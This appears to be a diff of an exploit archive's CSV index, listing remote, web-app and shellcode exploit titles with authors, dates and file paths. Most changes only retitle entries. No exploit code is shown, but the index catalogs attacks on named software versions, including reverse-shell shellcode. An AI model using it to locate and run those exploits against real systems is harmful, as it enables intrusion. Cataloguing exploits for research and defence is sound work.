19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
@ -11866,7 +11868,7 @@ id,file,description,date,author,platform,type,port
19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)",2012-06-15,Metasploit,windows,remote,0
19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)",2012-06-16,Metasploit,windows,remote,0
19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 - Getfile",1999-02-11,"Cameron Childress",multiple,remote,0
19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0
19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0
19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",windows,remote,0
19208,platforms/windows/remote/19208.txt,"Microsoft Site Server Commerce Edition 3.0 alpha - AdSamples Sensitive Information",1999-05-11,"Andrey Kruchkov",windows,remote,0
19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U FTP Server 2.5 - Buffer Overflow",1999-05-03,"Arne Vidstrom",linux,remote,0
@ -11885,7 +11887,7 @@ id,file,description,date,author,platform,type,port
19246,platforms/windows/remote/19246.pm,"Microsoft IIS 4.0 - Buffer Overflow (2)",1999-06-15,Stinko,windows,remote,0
19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0
19248,platforms/windows/remote/19248.c,"Microsoft IIS 4.0 - Buffer Overflow (4)",1999-06-15,"Greg Hoglund",windows,remote,0
19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0
19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four / Zero Header Length",1999-06-16,badi,linux,remote,0
19253,platforms/linux/remote/19253.txt,"Debian 2.1 - httpd Exploit",1999-06-17,anonymous,linux,remote,0
19266,platforms/windows/remote/19266.py,"EZHomeTech Ezserver 6.4 - Stack Overflow",2012-06-18,modpr0be,windows,remote,0
19288,platforms/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0
@ -11900,7 +11902,7 @@ id,file,description,date,author,platform,type,port
19322,platforms/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0
19327,platforms/solaris/remote/19327.c,"Sun Solaris 2.5.1 - rpc.statd rpc Call Relaying",1999-06-07,anonymous,solaris,remote,0
19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1) Exploit",1996-12-04,anonymous,aix,remote,0
19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0
19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0
19361,platforms/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 - Double Byte Code Page",1999-06-24,Microsoft,windows,remote,0
19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 - Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",multiple,remote,0
19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0
@ -11947,7 +11949,7 @@ id,file,description,date,author,platform,type,port
19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 ftpd - Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0
19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0
19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0
19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit",1999-10-11,"Georgi Guninski",windows,remote,0
19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - iFrame Exploit",1999-10-11,"Georgi Guninski",windows,remote,0
19540,platforms/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote,0
19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog Exploit",1997-10-19,"Bryan Berg",php,remote,0
19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 Exploit (1)",1998-03-16,Rootshell,hardware,remote,0
@ -12097,7 +12099,7 @@ id,file,description,date,author,platform,type,port
19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (2)",2000-05-16,L0pht,multiple,remote,0
19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (3)",2000-05-16,L0pht,multiple,remote,0
19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0
19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default 'Username' and Password",2000-05-17,"rain forest puppy",windows,remote,0
19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0
19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0
19926,platforms/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (3)",2000-04-08,"Jim Paris",linux,remote,0
19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 - Filetype",2000-05-13,http-equiv,windows,remote,0
@ -12354,7 +12356,7 @@ id,file,description,date,author,platform,type,port
20516,platforms/multiple/remote/20516.txt,"BEA Systems WebLogic Server 4.0 x/4.5 x/5.1 x - Double Dot Buffer Overflow",2000-12-19,peter.grundl,multiple,remote,0
20519,platforms/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 - Fast Mode TCP Fragment",2000-12-14,"Thomas Lopatic",multiple,remote,0
20522,platforms/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' File Disclosure",2000-12-23,bt,cgi,remote,0
20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure",2000-12-27,Ksecurity,cgi,remote,0
20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution and File Disclosure",2000-12-27,Ksecurity,cgi,remote,0
20524,platforms/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0
20525,platforms/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0
20527,platforms/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access",2000-12-30,isno,cgi,remote,0
@ -12472,7 +12474,7 @@ id,file,description,date,author,platform,type,port
20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 / OE 5.5 - XML Stylesheets Active Scripting",2001-04-20,"Georgi Guninski",windows,remote,0
20791,platforms/unix/remote/20791.php,"Netscape Navigator 4.0.8 - 'about:' Domain Information Disclosure",2001-04-09,"Florian Wesch",unix,remote,0
20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 - Relative Path Webroot Escaping",2001-04-23,joetesta,windows,remote,0
20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0
20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' / 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0
20796,platforms/linux/remote/20796.rb,"Zabbix Server - Arbitrary Command Execution (Metasploit)",2012-08-27,Metasploit,linux,remote,0
20797,platforms/multiple/remote/20797.txt,"Perl Web Server 0.x - Directory Traversal",2001-04-24,neme-dhc,multiple,remote,0
20799,platforms/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (1)",2000-01-11,"Synnergy Networks",cgi,remote,0
@ -12606,7 +12608,7 @@ id,file,description,date,author,platform,type,port
21102,platforms/cgi/remote/21102.txt,"Power Up HTML 0.8033 Beta - Directory Traversal Arbitrary File Disclosure",2001-09-07,"Steve Shepherd",cgi,remote,0
21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",cgi,remote,0
21109,platforms/windows/remote/21109.c,"EFTP 2.0.7 337 - Buffer Overflow Code Execution / Denial of Service",2001-09-12,byterage,windows,remote,0
21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory and File Existence",2001-09-12,byterage,windows,remote,0
21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory Existence / File Existence",2001-09-12,byterage,windows,remote,0
21112,platforms/linux/remote/21112.php,"RedHat Linux 7.0 Apache - Remote 'Username' Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0
21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote,0
21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0
@ -13266,7 +13268,7 @@ id,file,description,date,author,platform,type,port
23243,platforms/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0
23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)",2003-10-25,Adik,windows,remote,0
23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass (1)",2003-11-28,"Bugtraq Security",multiple,remote,0
23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0
23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0
23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0
23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access",2003-10-21,"Marc Schoenefeld",windows,remote,0
23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin - Cross-Site Scripting",2003-10-22,SecuriTeam,multiple,remote,0
@ -13387,7 +13389,7 @@ id,file,description,date,author,platform,type,port
23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",windows,remote,0
23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0
23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x - Error Page Cross-Site Scripting",2004-01-26,"César Fernández",solaris,remote,0
23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0
23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0
23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0
23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",windows,remote,0
23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)",2004-02-03,"Andreas Sandblad",windows,remote,0
@ -13402,7 +13404,7 @@ id,file,description,date,author,platform,type,port
23679,platforms/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote,0
23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote,0
23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow",2004-02-13,badpack3t,windows,remote,0
23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help And Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0
23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help and Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0
23721,platforms/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 - SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",hardware,remote,0
23728,platforms/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow/Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote,0
23730,platforms/windows/remote/23730.txt,"AOL Instant Messenger 4.x/5.x - Buddy Icon Predictable File Location",2004-02-19,"Michael Evanchik",windows,remote,0
@ -13588,7 +13590,7 @@ id,file,description,date,author,platform,type,port
24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)",2013-02-14,"Scott Bell",windows,remote,0
24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,windows,remote,0
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload (Metasploit)",2013-02-20,Metasploit,windows,remote,0
24529,platforms/php/remote/24529.rb,"OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-20,Metasploit,php,remote,0
24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)",2013-02-23,Metasploit,windows,remote,0
@ -13815,7 +13817,7 @@ id,file,description,date,author,platform,type,port
25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0
25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0
25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal",2005-05-05,dr_insane,windows,remote,0
25624,platforms/unix/remote/25624.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1)",2005-05-06,"Luca Ercoli",unix,remote,0
@ -14403,7 +14405,7 @@ id,file,description,date,author,platform,type,port
31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0
31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe_mode' Security Bypass Exploit",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
@ -14513,7 +14515,7 @@ id,file,description,date,author,platform,type,port
31912,platforms/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",multiple,remote,0
31918,platforms/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",multiple,remote,0
31920,platforms/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal",2008-06-13,"Tan Chew Keong",multiple,remote,0
31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' and 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0
31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0
31922,platforms/multiple/remote/31922.txt,"GlassFish Application Server - 'resourceNode/customResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
31923,platforms/multiple/remote/31923.txt,"GlassFish Application Server - 'resourceNode/externalResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
31924,platforms/multiple/remote/31924.txt,"GlassFish Application Server - 'resourceNode/jmsDestinationNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
@ -15016,7 +15018,7 @@ id,file,description,date,author,platform,type,port
35005,platforms/windows/remote/35005.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0
35006,platforms/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0
35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0
35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0
35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0
35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",hardware,remote,0
35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0
35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService - Arbitrary File Upload (Metasploit)",2014-10-21,Metasploit,windows,remote,0
@ -15733,7 +15735,7 @@ id,file,description,date,author,platform,type,port
41358,platforms/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
@ -15768,7 +15770,7 @@ id,file,description,date,author,platform,type,port
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
41738,platforms/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret and Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0
41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0
41808,platforms/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote,0
@ -15898,6 +15900,7 @@ id,file,description,date,author,platform,type,port
42958,platforms/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0
42964,platforms/lin_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,lin_x86-64,remote,8080
42965,platforms/multiple/remote/42965.rb,"OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)",2017-10-09,Metasploit,multiple,remote,2480
42973,platforms/windows/remote/42973.py,"VX Search Enterprise 10.1.12 - Buffer Overflow",2017-10-09,"Revnic Vasile",windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -17896,7 +17899,7 @@ id,file,description,date,author,platform,type,port
3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php id' Parameter SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0
3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0
3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0
3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0
3089,platforms/asp/webapps/3089.txt,"Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0
3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0
3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps,0
3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Parameter Remote File Inclusion",2007-01-07,beks,php,webapps,0
@ -18750,7 +18753,7 @@ id,file,description,date,author,platform,type,port
4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0
4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps,0
4524,platforms/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0
4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0
@ -20985,7 +20988,7 @@ id,file,description,date,author,platform,type,port
7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0
7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps,0
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 / PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,php,webapps,0
7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
@ -21023,7 +21026,7 @@ id,file,description,date,author,platform,type,port
7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - SQL Injection",2008-12-15,ZoRLu,php,webapps,0
7484,platforms/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,asp,webapps,0
7485,platforms/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
7486,platforms/asp/webapps/7486.txt,"Click&Rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0
